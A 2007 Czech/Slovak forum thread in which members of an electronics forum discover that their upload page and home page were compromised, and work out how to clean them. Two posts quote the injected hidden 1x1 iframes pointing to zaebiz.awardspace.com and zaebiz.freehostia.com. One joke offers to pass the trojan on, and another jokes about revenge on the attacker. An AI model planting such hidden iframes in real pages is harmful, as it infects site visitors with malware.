Trojskej kun

Zpráva

ccarloss · #1 Příspěvek od **ccarloss** » 29 kvě 2007, 13:47

Klepnul jsem na upload a pc mi ohlasil trojskeho kone

mam NOD32

#2 Příspěvek od **MetalGod** » 29 kvě 2007, 13:52

Už o tom byla zmínka tady: http://www.ebastlirna.cz/modules.php?na ... ght=#80322
A koukám, že se to ještě nevyřešilo

Radix · #3 Příspěvek od **Radix** » 29 kvě 2007, 13:53

Pořiď si Linux.
Teď zkouším skvělého Sama.

#4 Příspěvek od **Raptor181** » 29 kvě 2007, 14:40

WIN XP, NOD32 a ziadny konik, ani pejko...

#5 Příspěvek od **meno** » 29 kvě 2007, 14:47

Ja mám NOD32 a AVG a nehlási mi to nič

galjo · #6 Příspěvek od **galjo** » 29 kvě 2007, 15:18

ani DrWeb nič nehlásí.... A sem tam mi aj klúč z cracku uprace do archivu...

#7 Příspěvek od **MetalGod** » 29 kvě 2007, 15:36

Tak už asi ten problém (jak pro koho

) vyřešili.
Ale pokud se někomu z vás po tom oři z Tróje stejská, nechť mi napíše- mám ho staženej na ploše

#8 Příspěvek od **ZdenekHQ** » 29 kvě 2007, 16:17

Už to vidím, je to na konci stránky nekorektně přilepený za /html -někdo to přidal do php kódu, co generuje stránku uploadu. Použil zřejmě script, co přidá cokoliv na konec souboru.

Kód: Vybrat vše

iframe src='http://zaebiz.awardspace.com' width='1' height='1' style='visibility: hidden;'></iframe>

Je potřeba to ručně otevřít na serveru a smazat.

Vám, co to hlásí virus, máte předpokládám jako prohlížeč IE ?

#9 Příspěvek od **meno** » 29 kvě 2007, 16:48

Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku

Ale ak tam je tak by ho už mohol za tie 2dni aj niekto odstrániť !!! Nech sa zbytočne nešíri všelijaká haveď !!!

#10 Příspěvek od **ZdenekHQ** » 29 kvě 2007, 16:51

Já mám taky FF a jelikož předpokládám, že se chová korektně, tak všechno za koncovou značkou html ignoruje. Navíc antivir mlčí a žádný nový port se mě neotevřel ani se neobjevil nový proces "na pozadí".

#11 Příspěvek od **MetalGod** » 29 kvě 2007, 16:58

meno píše:Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku

Já to na hadrdüsku mám, dokonce přímo na ploše.
Nechce toho koníka někdo poslat? Je to má poslední nabídka!

#12 Příspěvek od **ZdenekHQ** » 01 čer 2007, 10:03

No - a teď ten blbec už rozvrtal i hlavní index a kdoví co ješte.

Myslím si, že pokud hlavní admin nemá čas se o fórum starat, tak má předat heslo od FTP a ostatní někomu, kdo na to čas má a taky občas zalátá nějakou tu bezpečnostní díru. Zatím se to nestalo ani u té staré.

Až spadne i databáze, bude celá bastlírna víte kde !

Crifodo · #13 Příspěvek od **Crifodo** » 01 čer 2007, 10:19

po připojení na domovskou stránku Bastlírny mám ve zdrojovém kódu stránky
<iframe src='http://zaebiz.freehostia.com' width='1' height='1' style='visibility: hidden;'></iframe>

něco tu zapáchá...

#14 Příspěvek od **ZdenekHQ** » 01 čer 2007, 10:36

No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.

Crifodo · #15 Příspěvek od **Crifodo** » 01 čer 2007, 10:57

ZdenekHQ píše:No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.

napřed by to chtělo ho identifikovat, to snad nebude pro admina nemožné.
Pak zveřejnit a nakonec uspořádat trestnou výpravu.
Rád věnuju kastrovací nožík